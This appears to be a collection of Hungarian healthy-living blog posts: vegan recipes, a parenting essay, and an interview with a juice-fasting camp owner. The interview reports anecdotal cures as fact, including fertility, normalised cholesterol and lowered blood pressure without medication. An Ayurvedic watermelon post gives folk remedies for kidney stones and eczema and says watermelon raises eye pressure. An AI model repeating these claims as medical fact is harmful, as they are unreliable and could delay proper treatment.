A következő főzelék két szempontból is különleges. Az egyik, hogy a borsó mellé karalábét is tettem, a másik, hogy a főzeléket sörélesztő pehellyel ízesítettem. A sörélesztő pehelytől még krémesebb íze lesz. Persze egy olyan embernek, aki soha nem próbálta a sörélesztő pelyhet, szokatlan lesz, de számomra olyan ízt ad az ételnek, mintha sajtot, parmezánt reszelnék bele. De elsősorban nem is az íze miatt teszem hozzá, hanem sokkal inkább a sörélesztő pehely tápértéke miatt.
Habár nem tartozik az esszenciális tápanyagok közé, a Maryland Egyetem Egészségügyi Központjának kutatásai bebizonyították, hogy a B-vitamin komplexek legjobb forrása a sörélesztő pehely. A sörélesztő ugyanis nagy mennyiségben tartalmaz B vitaminokat, mint például B1, B2, B3, B5, B6, B7, B9 vitaminokat.
A tiamin (B1 vitamin) a szénhidrátok, zsírok, aminosavak, az alkohol, valamint a glükóz anyagcseréjében játszik kulcsszerepet. Támogatja az idegműködést és a szív egészségét. Mint minden B-komplexbe tartozó vitamin, a tiamin is vízben oldódik. Ha túl keveset viszünk be belőle, a hiányállapot korai tünetei lehetnek: étvágycsökkenés, hasi diszkomfort, székrekedés, kimerültség, ingerlékenység, memória- és alvászavarok, mellkasi fájdalmak.
A riboflavin (B2, de G-vitaminként is ismert) fontos szerepet játszik a fehérjék és szénhidrátok anyagcseréjében. Ha túl keveset viszünk be belőle, a hiányállapot a bőr kisebesedését okozhatja a szájban, a szemkörnyéken és a nemi szerveken.
A niacin (B3) vitaminnak sejtanyagcserében létfontosságú szerepe van. Súlyos esetben a niacinhiány következtében felléphet a pellagra, amelynek jellemzője a bőr gyulladása, a nyálkahártyák elváltozása, gyomor- és béltünetek, valamint idegrendszeri-pszichés tünetek, szellemi leépülés is lehet a következménye.
A B5 vitamin, másnéven pantoténsav alapvető szerepet játszik a szénhidrátok, lipidek és egyes aminosavak lebontásában. Hiánya a különböző mikroorganizmusok elszaporodását okozhatja a szervezetben, és kellemetlen tünetekkel, rossz közérzettel, hasfájással, a bőr égő-viszkető fájdalmával járhat, főként a lábon. A B5 vitamin a B6 vitaminnal együtt segít az őszülés megelőzésében, lassítja annak a folyamatát. (forrás: soreleszto.com)
A fentiekben néhány indokot leírtam, miért érdemes minél több alkalommal az ételhez keverni a sörélesztő pelyhet.
A recept
Hozzávalók:
- 1 kg zöldborsó (nálam bizony 24 óra alatt elfogy ennyi mennyiség)
- 1 fej karalábé
- ételízesítő
- fokhagyma
- petrezselyem (ha friss, annál jobb)
- víz
- kukoricakeményítő
- sörélesztő pehely
- növényi tej vagy tejszín
Elkészítés:
A fagyasztott zöldborsót (vagy nyáron a zsenge, frissen kifejtett) átmossuk egy kis vízzel. a karalábét meghámozzuk és kisebb kockákra vágjuk.
Az edénybe, amiben odatesszük főzni annyi vizet teszünk a borsóra és a karalábéra, hogy éppen ellepje, majd indulhat a főzés. Amikor a borsószemek már megpuhulnak - kívül roppanósak, belül puhák és nem nyersek, hozzáadjunk egy kis ételízesítőt, megmosott, apróra vágott petrezselymet, aprított, vagy összenyomott fokhagymát.
Kb. 2 -3 dl növényi tejet kikeverünk kb. 2 ek keményítővel és 1-2 ek sörélesztő pehellyel. A sörélesztőpehelytől krémesebb lesz a főzelék. Amikor a zöldborsó teljesen megfőtt, szép lassan hozzákeverjük a tejben elegyített keményítőt, addig keverjük, míg be nem sűrűsödik.
Aki pedig piros színben szeretné elkészíteni, az a következő módosítással teheti picit fűszeresebbé:
A növényi tejhez nem csak keményítőt keverünk, hanem pirospaprikát is. (Kb. 1 csapott ek pirospaprika.)
Tudom, egyesek hagymás alapon lisztet pirítanak és úgy habarják be. Kipróbáltam már mindegyiket, nekem mégis az egyszerűbb a nagyszerűbb. Nem azért, mert sajnálom az erőt vagy időt a másik elkészítési módokhoz, hanem így egészségesebb is, és számomra tényleg finomabb.
Amikor ezt készítettem, petrezselymem épp nem volt itthon, ezért kimaradt, de azzal még jobb lett volna.
Tálaláskor hidegen sajtolt tökmagolajat csepegtethetünk főzelékünk tetejére.
Gondolatok az elvárásokról és a nevelésről
2018. október 14. Élj harmóniában
A nevelés fő eszköze a példamutatás... továbbá a szeretet és a türelem. Nem hiszek a megfélemlítés alapú nevelésben, mert a végeredmény nem lesz megfelelő. Lehet, hogy ránézésre eléri a célját, de túl sok a mellékhatás. A negatív, megfélemlítésen alapuló nevelésnél sok esetben van, amikor valaki szorongással, aggodalmakkal, önértékelési problémákkal , önbizalomhiánnyal, megfelelési kényszerrel vagy frusztrációval küzd. Nevelni a legjobban a megfelelő példamutatásoddal tudsz. Bármit elvársz valaki mástól, először azt neked kell megtenned, megmutatnod. Ha szeretnéd, hogy a környezeted kedvesebb legyen, légy Te kedvesebb. Ha szeretnéd, hogy a gyereked ne dobja el a szemetet, akkor először mutass példát azzal, hogy te sosem szemetelsz. Ha szeretnéd, hogy mások alázatosak legyenek, akkor először légy Te alázatos, mutasd meg, hogyan kell lereagálni alázatosan az élethelyzeteket.. Ha szeretnéd, hogy elismerjenek, akkor ismerj el Te másokat. Ha szeretnéd, hogy mások türelmesebbek legyenek akkor először légy Te türelmesebb másokkal. Ha szeretnéd, hogy a gyereked többet olvasson, akkor először olvass Te többet. Ha szeretnéd, hogy a környezetben élők ne agresszióval kezeljenek egy konfliktust, akkor először Te tudj türelmes és békés maradni konfliktushelyzetben. Ha szeretnéd, hogy a családtagjaid kevesebbet tévézzenek, akkor először hagyj fel Te a tv nézéssel. Ha szeretnéd, hogy a gyereked ne egyen édességeket, akkor Te szokj le az édességek fogyasztásáról. Ha szeretnéd, hogy a környezeted ne kritizáljon, akkor először légy Te aki nem kritikus. Ha szeretnéd, hogy elfogadjanak, akkor először fogadj el Te másokat olyannak amilyenek. Ha szeretnéd, hogy a Földön béke legyen, akkor ne légy agresszív, teremts békét magad körül. Ha szeretnéd, hogy szépen bánjanak Veled, akkor először te bánj szépen másokkal. hosszasan sorolhatnám... Ezt jelenti másokat vezetni.. mert mások akkor fognak követni, ha Te elől jársz és példát mutatsz. Régi korokban így jártak el a királyok, hadvezérek... példát mutattak és a többiek követték őket. Bárki aki szeretne követőket - mindegy, hogy egy főnök, egy férj, egy családfő vagy hadvezért - az első dolog amit meg kell tanulnia, hogy a példamutatáson keresztül lehet nevelni, tanítani, vezetni. Csak azt várhatod el másoktól, amit magad is úgy teszel Néhány éve már a stresszkezelő tanfolyamaimra nem csak munkahelyi és párkapcsolati stressz miatt jönnek az emberek... sajnos egyre többen a gyerekükkel kapcsolatos dolgokat nem tudják kezelni. Egy anyuka nem tudta kezelni, hogy a 16 éves fia kiabál vele... első kérdésem az volt, hogy ő kiabált-e a gyerekkel.... ha a gyereknek az a minta, hogy a szülő úgy kezeli a problémát, konfliktust, hogy kiabál, akkor miért lepődik meg bárki, ha a gyerek is így fogja kezelni a problémáit? "Először magadban kell létrehozni a változást, amit a világtól követelsz." Gandhi Sok szeretetet és türelmet kívánok a változáshoz:) Kati
Teszt: Say Cheez Raw
2018. szeptember 27. Zizi kalandjai
Előre leszögezem... a Say Cheez Raw vegán sajtjai a mennyországot jelentik. Én együltő helyemben meg tudnék enni a füstölt paprikásból vagy egy kilót! Nem azért, mert kívánom a sajtot, hanem, mert annyira finomak. Ez a kis csoda hely 2017 februárjában nyitotta meg kapuit. A tulajdonos vegán pár közül Mercédesz szeretette a sajtokat és megígérte a párjának, Rolandnak, hogy otthon házilag készít... Source
Könnyű waldorf saláta (vegán)
Könnyűnek nevezem, mert könnyű elkészíteni és a gyomornak sem megterhelő. Nem is waldorf salátának kellene nevezni, hanem Oscar vagy Tschirky salátának (oké, ez utóbbi nem nyerő név, talán). Azon egyszerű oknál fogva, hogy az első megalkotója Oscar Tschirky volt. Oscar szakácsként a New York városában lévő Waldorf Hotelben készítette el e remek salátát, először még dió nélkül. A kor ismert és jó hírű szakácsa volt Oscar, aki később még szakácskönyvet is írt, amibe természetesen a saláta receptje és története is belekerült. A salátát már az 1890-es években elkészítette egy 1500 fős jótékonysági bálra, annak is a 9 részes menüjébe építette bele. A könyv azonban csak 1928-ban jelent meg a saláta recepttel és az ezersziget öntet eredeti receptjével is. Oscar amúgy meglehetősen jól ismerte a kor milliomos embereit, jóformán mindet név szerint is. Igyekezett is kedvükben járni. Jól tudta, hogy ha a vendégek gyomra finomságokkal van tele, akkor az ő hírneve is erősödik.
Oscar Tschirky és az egykori Waldorf Szálloda New Yorkban.
A recept
Hozzávalók:
2-3 db alma (inkább savanykásabb, mint édes legyen)
1 db közepes zellergumó
5-8 dkg először áztatott, majd enyhén pirított dióbél
1/2 citrom frissen facsart leve
1 szója joghurt
majonéz (opcionális)
Elkészítés:
A zellert hámozást követően csíkokra, majd kockákra vágjuk. Ezt követően az almát is felkockázzuk. A felkockázott almát meghintjük a citrom levével, hogy ne barnuljon be. A beáztatott diót gyengéden megpirítjuk, pár darabot félre teszünk díszítésnek, a többit késsel durvára aprítjuk. Ezekután a zellert, almát és diót egy tálban összekeverjük majd hozzáaadjuk a joghurtot. Ha majonézesen szeretnénk, 1-2 evőkanál majonézt kikeverünk joghurttal és úgy keverjük össze a saláta többi hozzávalójával.
"Maximális az ellátás a levekben és bővőlködő a szeretet"
Ahogy korábbi írásomban beszámoltam róla, idén nyáron férjemmel közösen egy eldugott, kis, észak-szerbiai falucskában, Crna Bara-n (magyarul Fekete-tó) egy 10 napos léböjt táborban vettünk részt. Az egész tábor ideje alatt kimondott éhséget nem éreztünk, ha egyszer-kétszer reggel vagy este meg is kordult a gyomor, valóban nem hiányzott az étel, az ételbe harapás is csak inkább a tábor vége felé, amikor már táboron kívüli illatok hatása jobban beindította a megszokott ételekre való gondolást. A lényeg viszont, hogy üdén, frissen éreztük magunkat a táborozás ideje alatt és után is, valamint bizonyos egészségügyi problémáktól megszabadultunk. Egyben segített egy hatalmas erős lépést megtenni annak érdekében, hogy amennyire csak lehet tényleg növényi táplálékokat fogyasszunk. (A tábor hatására kezdtem el olvasni a 80/10/10 könyvet Dr. Douglas N. Graham-től.) Nehéz időszakon voltunk túl, ha csak az elmúlt pár évet tekintem, hiszen az új ország (Anglia), új környezet, új szokásokat hozott. Szerettünk volna egészségesebb szokásokat kialakítani, amihez szintén hozzásegített a tábor.
Vidám táborozók és dolgozók közös csoportképe
Hazatérésünk óta jó néhány ember mondta, hogy egész máshogy nézünk ki, egészségesebb kinézetünk van, mintha megfiatalodtunk volna (ajánlom a tábort botox helyett minden nőnek is). A táborozás során igyekeztem több emberrel beszélgetni, különösen, hogy a táborozók zöme már járt léböjt táborban, és nekik egészen más élmény a visszatérés miatt is az idei tábor. Érdekelt a tapasztalatuk, amit eddig éltek át a táborok során. Kiváncsi voltam, vajon mi vezérli vissza ide azokat az embereket, akik már léböjtöztek egyszer-kétszer vagy akár ötször is. Ezekről a tapasztalatokról is szeretnék idővel beszámolni, de a mostani írásomban szeretném megosztani a Kedves Olvasóval a léböjt tábor tulajdonosával készített interjút. Sajnos a léböjt tábornak jelenleg nincs weboldala, pedig jelenlegi világunkban a legtöbb ember kezében ott van a ragadós okos telefon, ami által könnyebben rátalálhatnának erre a táborra. Többek között ezt próbálom pótolni a léböjt táborról szóló bejegyzéseimben, akár csak ezzel az interjúval.
A tábor tulajdonosa, Német Antal, szerbiai származású magyarul és szerbül mondhatni anyanyelven beszélő egy gyermekes, ötvenes éveiben élő családapa, aki - bátran mondhatom - nem nyerességvágyból tartja fenn a táborokat, gyakorta a saját fizetéséből is besegítve annak működésébe. Célja, hogy minél több ember egészségesen távozzon egy 10 napos léböjt tábor után, valamint a táborok segítségére szolgáljanak az embereknek a helyes és egészséges életmód rátalálására, megerősítésére.
A táborban - mialatt a léböjtöt ő is velünk folytatta - szorgalmasan intézte a táborral járó szervezési feladatokat, s a nehezebb fizikai munkát sem vetette meg. Mi sem mutatja jobban, hogy a vele tartott interjúmat három különböző alkalommal tudtuk csak megejteni.
- Hol és mikor kezdődött a léböjt tábor gondolata?
2005-ben Siposné Szécsi Ilona ötletére bólintottam. Mikor kérdeztem, mi minden kell, mondta, hogy sok répa, cékla és más zöldségek, gyümölcsök. Így kaptam az alkalmon és ezeket is ültettem. Az első léböjt tábor hét napos volt, egész más körülmények közt, mint most. Azóta sokat fejlődött és most is fejlődik a hely. Ezen a táboron kb. 17 résztvevő volt. Nagyon jól sikerült, áldott kis csapat volt. Jókedvű volt mindenki, kellemeseket beszélgettünk. Egy szobába aludtam az egyik táborozóval, aki a tüdejére kapott kemoterápiát a tábor előtti időszakban. Megfogta a szívem, amikor könnyes szemekkel mondta a tábor végén, hogy ő csak egy táborba jött, de nem csak fizikai egészségére szolgált, hanem lelkileg is sok támogatást kapott.
A képen: Német Antal és Siposné Szécsi Ilona, akik nélkül a tábor nem jöhetett volna létre és a táborozók közé élénkséget hozó Rebeka, aki a tulajdonosnak és feleségének, Évinek a kislánya.
- Évente hány alkalommal rendeztek ilyen léböjt tábort?
Évente általában kétszer van átlagosan. Egy szabadkai származású, Németországban élő segítségünk van, de ő iskolába jár most. Volt, amikor három tábor is volt egy évben, mindig nyaranként vagy nyárhoz közeli időpontban. Most építünk át egy épületet, ahol a körülmények lehetővé teszik majd a hűvösebb időszakokban is a táboroztatást. Az első évben 7 napos, utána pedig 10 napos volt mindegyik tábor.
- Miért 10 napos a tábor?
A vese tisztítás 5 nap, máj tisztítás 5 nap, így hatékonyabb, mint a 7 napos periódus.
- Más táborok is szerveződnek itt?
Nyers ételek tábor is szokott lenni. Öt éven keresztül elég sok ember jött el, a legutolsó táborban közel 50 fő vett részt. Itt inkább bemutató jelleggel történik minden. A valós munkacsapat mellé beengedtünk néhány embert a konyhába, akik szintén segítettek és így tanulták is az ételek elkészítését, mindeközben kint is volt egy bemutató szakács. Aszalványok, csírák, öntetek, salátafélék készülnek, de semmi tűzhely használat nem történik.
Gyerektábort is szerveztünk az idei évben és szeretnénk ebből is rendszert csinálni szegény gyermekek számára, akiknek a szülei nem engedhetik meg, hogy akár egy táborba elküldjék gyereküket. Ez a tábor teljesen ingyenes volt számukra, vegetáriánus konyhával. Sok gyermek érkezett túlsúllyal, s mivel itt sokat mozogtak, reggeli torna, játékok a friss levegőn, kézműves foglalkozások, így több gyermek is fogyott a táborozás során. A táborból hazaérve ők kérték, hogy otthon is fogyasszanak több zöldséget, gyümölcsöt.
A tábor, ingyenes volt ezeknek a gyerekeknek és környékbeli adományokból sikerült az élelmet előteremteni. Sokan segítettek gyümölccsökkel, zöldségekkel és önkéntes munkákkal is.
- Milyen eredményeket tudsz felidézni az elmúlt évek táboraiból?
Közel 1200 ember fordult meg eddig, különféle bajokkal, problémákkal. Például egy 40 éves németországi nő úgy érkezett, hogy mindkét lába nagyon dagadt volt, szívproblémával is küzdött. Tisztítókúrázott, kezeltük a lábát vérkeringést serkentő hidroterápiával és 10 nap alatt leapadt a lába. Következő alkalommal már úgy jött a táborba, hogy nem volt feldagadva a lába.
Valakinek fülzúgása volt, ami lecsendesedett és ritkábbá vált.
Más személyek hátfájással érkeztek és távozáskor már nem fájt nekik.
Egy hölgy térdfájással érkezett és a hetedik napon már a tótól, ami három kilométer, szinte futott vissza a táborba, nem gyalogolt. Hihetetlen, de valóság!
Volt, akiknek nem lehetett gyermekük, nem jött össze, hiába próbálkoztak. Nem szerettek volna hormonális kezeléseket kapni. 4-5 személynek is volt olyan tapasztalata, hogy a léböjt tábor után gyermekáldásban részesültek. Van olyan, aki már a gyermekével jön vissza léböjtözni.
Egy asszony csuklóját nem tudta hajlítani az érkezés napján, a 10 nap alatt pedig elérte, hogy tudta mozgatni a keze fejét gyönyörűen.
Sokan érkeztek az évek során a táborokba úgy, hogy nagyon maguk alatt voltak, de mi mindig igyekszünk mindenkit szeretettel körbe venni. Valaki könnyes szemmel számolt be a tábor végén arról, hogy olyan szeretetet érzett itt, amit gyermekkorában édesanyjától kapott.
Más valaki igen magas vérnyomással érkezett (180-190) és 10 nap alatt leesett a vérnyomása szép lassan (110-re), úgy, hogy nem szedett gyógyszereket és nem lett rosszul.
A holland-német határ közeléből jött egy táborozó meglehetősen magas koleszterinszinttel, az orvosok sem tudtak már mit kezdeni vele, léböjtözés után még a nyers táborban is maradt egy darabig. Mikor hazament és vérvizsgálatot végeztek nála, az orvosa teljesen ledöbbent, hogy a koleszterinszintje normalizálódott. Meg is kérdezte, hogy mi történt, mivel az előző egy évben a gyógyszeres kezelés jóformán semmit sem hatott. A páciens elmondta neki, hogy itt járt a léböjt táborban. Ő a következő évben is eljött és anyagilag hozzásegítette a tábort az újabb fejlesztési lehetőséghez.
Volt olyan tábor, ahol 96 vendég sereglett össze, később pedig volt egy tábor, ahol 60 német jött el.
- Mit gondolsz, mi a tábor titka?
A jó Isten áldását látom. Mi is igyekszünk mindent beleadni, hogy szeretettel vegyük körbe a vendégeket, beszélgetni velük, hasznos időket tölteni velük. Német vendégek azért is szeretnek ide járni, mert elmondásuk szerint a tábor tulajdonosa sok helyen nincs velük, én meg ott vagyok köztük, én is léböjtözöm, figyelek rájuk, együtt töltjük az egész napot.
- Ha egy nem hívő ember, egy nem keresztény jön el, hogyan tudja itt jól érezni magát?
Alapból egy jó légkör van itt. Az előadások, áhitatok is jó hatást gyakorolnak az emberekre, akárcsak a közös beszélgetések is. Egy nem hívő számára az első néhány nap talán szokatlan lenne, de eddig mindenki jól feltöltődve távozott vallási hovatartozástól vagy gondolkodásmódtól függetlenül.
- Kiknek ajánlod a léböjt tábort?
Szinte mindenkinek, aki nyitott erre. Nem anyagi szempontból tekintve, de minden embernek fontos lenne évente egy ilyen tisztító kúra, mert amit az élelmiszeripar előállít, amit a boltokban vásárolni lehet, rengeteg tartósítószert, méreganyagot tartalmaz, bizonyos környezetszennyezettségi befolyások is ártalmasan érnek bennünket. Szervezetünk sok idegen és méreganyaggal találkozik, aminek a következménye a sok allergia, daganatos megbetegedés, betegségek, különféle izületi fájdalmak. Az élelmiszer termelés nem olyan állapotban van napjainkban, mint régen. Mindent vegyszereznek. Különösen az állati eredetű táplálékot fogyasztók magas számú méreganyagokat juttatnak a szervezetükbe. A bemérgezett ételek okozzák a legtöbb egészségügyi problémát.
- Mennyire szenvedtél meg az első léböjt táborod alkalmával?
Ma már 26 éve vegetáriánus vagyok, tehát akkor is vegetáriánus voltam, de arra emlékszem, hogy nagyon szenvedtem a hátfájásomtól abban az időben. Masszírozás sem igazán segített. Szerencsére többen jöttek hátfájással az első táborra, és ahogy nekik, úgy nekem is elmúlt a hét nap alatt. Pedig akkor még béltisztító formulák nélkül csináltuk ezt a léböjt tábort. A végefelé volt egy kisebb rosszul létem, de nem viselt meg.
A képen Német Antal, a tábor vezetője, épp fekete-levesét fogyasztja. Köztünk járt, velünk léböjtölt. Mindenkihez volt egy-egy kedves szava, nap mint nap érdeklődött hogy létünk felől.
- Mi a jövőképed a táborra nézve?
Tisztában vagyunk vele, hogy a tábor körülményei továbbra is fejlesztésre szorulnak. Ha minden igaz, jövőre már öt felújított szobánk lesz. Mindenki házakban van elszállásolva most is (kivéve a lakókocsisokat), de ezek régies vályog és téglaházak. Egy kivételével mindegyiknek van fürdőszobája. Szeretnénk legalább 10-14 felújított szobával működni.
- Ha valaki azt mondaná, lehet három kívánságod és teljesül, mi lenne az a három?
Elsődlegesen, hogy az épületeket fel tudjuk újítani, legalább 10 szoba legyen meg.
Második, több munkatárssal tudjunk dolgozni és több szolgáltatást nyújtani.
Harmadik pedig, hogy több vendég legyen, a fenntartás miatt is. Eddig a saját jövedelmemből is hozzá kellett tenni, hiszen az eddigi bevételek az évi költségeket, úgy mint épületadók, rezsiköltségek, takarítás, stb. még nem tudta lefedni egészében. De nagyon bízok abban, hogy a jó Isten ezután is megsegít.
- Ha valaki támogatni, segíteni szeretné a tábort, milyen eszközökre van a legnagyobb szükség a további fejlődéshez?
Ahogy említettem, tervben van több fürdőszobás szoba kialakítása, amihez mosdó, tusoló, csempe, wc és törölközőtartó kell.
Tervben van, hogy térkővel a tábor további útvonalait, sétányait lefedjük.
Az egyik épülethez lemeztetőre is szükség van.
A szobákat szeretnénk egységes, egészséges ágyakkal, matracokkal, párnákkal és takarókkal felszerelni.
Szeretnénk egy miniatür szanatóriumot kialakítani, amihez tégla, tető és nyílászárók is szükségesek lennének.
Ha az épületek szobái rendben vannak, radiátorokkal és központi fűtéssel szeretnénk őket őszi és tavaszi használatra is felkészíteni, de nyilván ezt megelőzően még sok lépés áll előttünk.
Szeretnénk egy kisebb autóba (pl. Suzuki) is beruházni, megkönnyítve ezzel a beszerzéshez szükséges utak üzemanyag és fenntartási költségeit, mert jelenleg egy öreg (több, mint 10 éves) furgon áll minden út rendelkezésére.
(A táborról bővebb felvilágosítást nemeta@tippnet.rs e-mail cimen kaphatunk.)
Jelenleg minden adománynak örülünk, hogy az egyszerű körülményeinket még jobbá tegyük. Egyszerűek a körülmények, de annál maximálisabb a levekben az ellátás és bővölködik a szeretetben.
Barackos nyers finomság
Ugyan ez a sütemény 3 rétegből épül fel, azonban nem tart sokáig elkészíteni. Egy jó turmixgép és aprítógép/daráló szükséges hozzá. Most, hogy barackidény van, terem a sok finom különféle barack, bármelyik fajtáját felhasználhatjuk hozzá, csak édes és érett legyen. Előnye, hogy nem kell sütni, csak a hűtőben pihentetni, hogy jól megdermedjen, valamint tele van rosttal, így igazán egészséges.
A recept
A desszert alapja
Hozzávalók:
- kb. 2-3 nagyobb bögre olajos magvak, mogyorófélék (pl.dió, lenmag, mogyoró)
- datolya és/vagy mazsola
- víz
Elkészítés:
Az olajos magvakat és mogyoróféléket külön külön jó alaposan megdaráljuk pl. kávédarálóval. A datolyát felaprítjuk, meleg vízbe beáztatjuk, majd ha felpuhult, a vizet leszűrjük róla és gyorsraprító gépben pépesre daráljuk. Ha csak mazsolával dolgozunk, azt is beáztatjuk, hogy felpuhuljon, majd a vízet leszűrjük róla és hozzákeverjük a mag őrleményhez. Egy kevés vizet adunk még hozzá, ha szükséges ahhoz, hogy egy nagy gombócot tudjunk formálni ebből a masszából. Egy tortaformát vagy egy tepsit és folpackkal kibélelelünk és az aljába nyomkodjuk a nyers tésztát. Hűtőbe tesszük, míg a barackos krém elkészül.
A barackos krém receptje
Hozzávalók:
- 2-3 bögrényi nagyon érett barack (fagyasztott is lehet)
(Bármelyik fajta barack jó: nektarin, őszibarack, kopaszbarack, sárgabarack, stb.)
- meleg vízben áztatott datolya (kb 1/2 bögrényi)
- max. 1 dl víz
- 5-6 ek útifűmaghéj
Elkészítés:
Vegyük elő a turmixgépet (vagy egy erős aprítógépet) és a fentieket az útifűmaghéj kivételével tegyük bele. Indítsuk el, és ha a barackból barackszószunk lett, akkor kb 5-6 evőkanálnyi útifűmaghéjjal is turmixoljuk össze. Hagyjuk állni hűtőben. Nagyjából negyed óra múlva kenhető állagú krém lesz belőle. Ha nem elég szilárd ahhoz, hogy kenni tudjuk, még némi útifűmaghéjat keverjünk hozzá (fakanállal is átkeverhető). A kész krémet egyszerűen elkenjük az őrölt magokból készült tésztán. Hűtőben tároljuk további munkálatokig.
Fehér hab receptje
Hozzávalók:
- 1/2 bögrényi dióféle
- 1/2 bögrényi meleg víz
- 1-2 ek áztatott mazsola vagy datolya
- 1 ek útifűmaghéj
Elkészítés:
A diófélét és a mazsolát beleszórjuk a turmix gépbe (ha van lehetőségünk a diófélét előáztatni, még jobb), meleg vizet öntünk rá és összeturmixoljuk. Hamar egy tejföl-szerű állagot kell kapjunk. Hozzáadunk kb. 1 ek útifűmaghéjt, átkeverjük, majd a sütemény tetejére simítjuk.
Végső műveletként megszórtam karobporral.
A görögdinnye hatásai és ájurvédikus alkalmazása
2018. augusztus 8. Élj harmóniában
A görögdinnye júliustól szeptember elejéig megtalálható a zöldségeseknél, vidéki útszéli dinnyeárusoknál. A görögdinnye egy ízletes, édes, hűsítő, lédús gyümölcs - az angol elvnevezése ezt takarja is watermelon:) Nagyon vizes, és az ájurvéda nehezen emészthetőnek tartja. A görögdinnye egy kifejezetten vízhatjó gyümölcs. Emeli a kapah-t és a vata-t és csökkenti a pittát. Megközi kicist a székletet és jól átmossa a veséket. Soha ne egyél görögdinnyét étkezés után 3 órán belül. Ne fogyassz görögdinnyét estére, éjszakára és felhős, esős napon, ködös , párás időben sem, mert ödémát és hasi fájdalmat okozhat. Soha ne fogyaszd gabonával együtt - pl kenyér dinnye - mert nagyon megnehezíti az emésztést. A hűsítő és nehéz jellemzői miatt, a túl sok görögdinnye fogyasztása légzési nehézséget okozhat. A görögdinnye növeli a szemnyomást, ezért nem jó olyanoknak akik zöld hályogtól szenvednek. A túl sok görögdinnye blokkolja a hímivarsejteket is. Néhány ájurvédikus alkalmazási mód: Egy csésze dinnyelé, egy csipet őrölt római kömény porral napi 3szor, üres gyomorra fogyasztva ideális égő vizeletre, hólyaggyulladásra és húgycsőgyulladásra. Vesefájdalom esetén, napi 2 vagy 3 alkalommal igyál 1 csésze dinnyelevet, amibe teszel 1/4 teáskanál koriander port. Ez jól át fogja mosni a veséd, eltávolítja a kis homokot és kristályokat a vesédből . Gyenge izmok erősítésére, őrölj le fél csésze görögdinnye magot és készíts belőle pasztát. Adj hozzá egy teáskanál cukrot fél teáskanál ghít és üres gyomorra fogyaszd el. Viszketés vagy ekcémás bőr esetén - vagy akár ha a bőrön allergiás tünetek vannak, edd meg a görögdinnye piros részét a fehéret pedig dörzsöld a bőrödhöz az érintett felületre. Ez enyhíteni fogja a viszkető, égő érzést végül egy szokatlan recept a csodás bőrért:) Vegyél egy közepes görögdinnyét, csinálj bele egy lyukat és tedd félre azt a darabot, amit kivettél belőle. Tegyél a résbe 2 teáskanál nyers baszmati rizst, egy teáskanál kurkuma port, egy teáskanál szantálport, 1/4 teáskanál étkezési kámfort, egy csipet sáfrányt, egy teáskanál lime levet. Zárd le a rést azzal, hogy visszateszed a kivágott darabot. Tartsd a görögdinnyét egy hétig száraz, meleg helyen. 1 hét után vedd ki a darabot és vedd ki a pasztát belőle. Azt szárítsd meg egy forró, száraz helyen, de ne közvetlen napon. Ez a paszta kozmetikai célokra használható, naponta lehet alkalmazni. Ettől a bőröd fiatalos és szép lesz:) Az a knet és ekcémát is eltávolítja. Vegyszermentes (bio) dinnyét fogyassz. felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Gyorsan, könnyen elkészíthető barackos bögrés sütemény
2018. július 18. Élj harmóniában
Gyorsan, könnyen elkészíthető barackos bögrés süteményItt a sárgabarack szezon (jótékony hatásairól itt olvashatsz) és ilyenkor érdemes a sárgabarackból minnél többet fogyasztani, mindenféle formában. Nem tudom ki hogy van vele...én szeretek sütni főzni, de nem szeretek hosszasan ácsorogni a konyhában - főleg nyáron nem. Ez a süti tipikusan olyan nyári édesség, ami nagyon gyorsan elkészül és nagyon ízletes is. Bevetheted egy étkezés helyett (pl. reggelire) vagy akár vendégvárónak is kiváló egy könnyű vasárnapi ebéd után. Jól szállítható ezért viheted vendégségbe, kirándulásra vagy akár strandra is :) Hozzávalók 1 csomag sütőpor 3 bögre liszt (keverheted is teljes kiőrlésű liszttel, ahhoz több vízre lesz szükséged) 1 bögre barna nádcukor 10 dkg vaj (vegán változatban kókuszzsír) 1 tk. szódabikarbóna vanília (vagy vaníliás cukor) 1,5 bögre víz sárgabarack Vegyszermentes (bio) alapanyagokat használj:) Az előkészítéshez mosd meg a barackot, és szedd félbe, vagy negyedbe. A lisztet, sütőport, szódabikarbónát, cukrot és a vaníliát kever össze egy tálba. majd a vajat olvaszd meg és öntsd a keverékhez a vízzel együtt . Én erre sokszor azt a módszert használom, hogy a vizet forrón ráöntöm a vajra és a végén a vajas, vizes keverékkel öntöm fel:) Az egészet keverd jól el - figyeld a tészta állagát van amikor elég 1 bögre víz van, hogy sokkal több kell a liszt függvénye). Az így kapott masszát öntsd bele egy kivajazott, lisztezett tepsibe és a felvágott barackokat helyezd szépen a tetejére. kb. 180 fokon süsd addig, amíg jók átsül és szép arany színe lesz. (kb 30 perc)
vörösbabos mogyorós keksz
Ez az édesség minden szempontból nyerő találat! Cukor, glutén, és laktózmentes. Fehérjében gazdag, ráadásul zöldségből van, de senki nem tudná megmondani róla. Ajánlani tudom mindenkinek, nem bánjátok meg. :) Hozzávalók - 1 konzerv vörösbab - 1tojás - 250ml kókusztej, vagy más folyadék - 100gr kókuszliszt - 65gr mogyoró - 40gr édesítőszer - fél csomag sütőpor Így készítsd - Szűrd le a babot - Tedd turmixgépbe, majd add hozzá a többi hozzávalót - Ha szép homogén masszát kaptál, kanalazd sütőpapírral bélelt tepsibe - Süsd ki 180fokos sütőben 20 perc alatt
Kókuszos gojis szelet
2018. június 15. Beautilicious
Nyári könnyű, finom, és természetesen cukor és gluténmentes édesség. Hozzávalók - 200gr tejföl - 2 tojás - 50gr édesítőszer - 50gr goji bogyó - 200gr kókuszreszelék - kis rumaroma Így készítsd - Válaszd ketté a tojásokat - Keverd fel a tojássárgáját az édesítőszerrel - Add hozzá a sárgájához a többi hozzávalót - Verd fel a tojásfehérjét - Forgasd a fehérjét a masszához - Öntsd formába ( én kenyérsütő formát használtam) - Süsd ki 170fokon 40-45perc alatt
A kókusz hatásai és ájurvédikus alkalmazása 10 TIPP
2018. június 7. Élj harmóniában
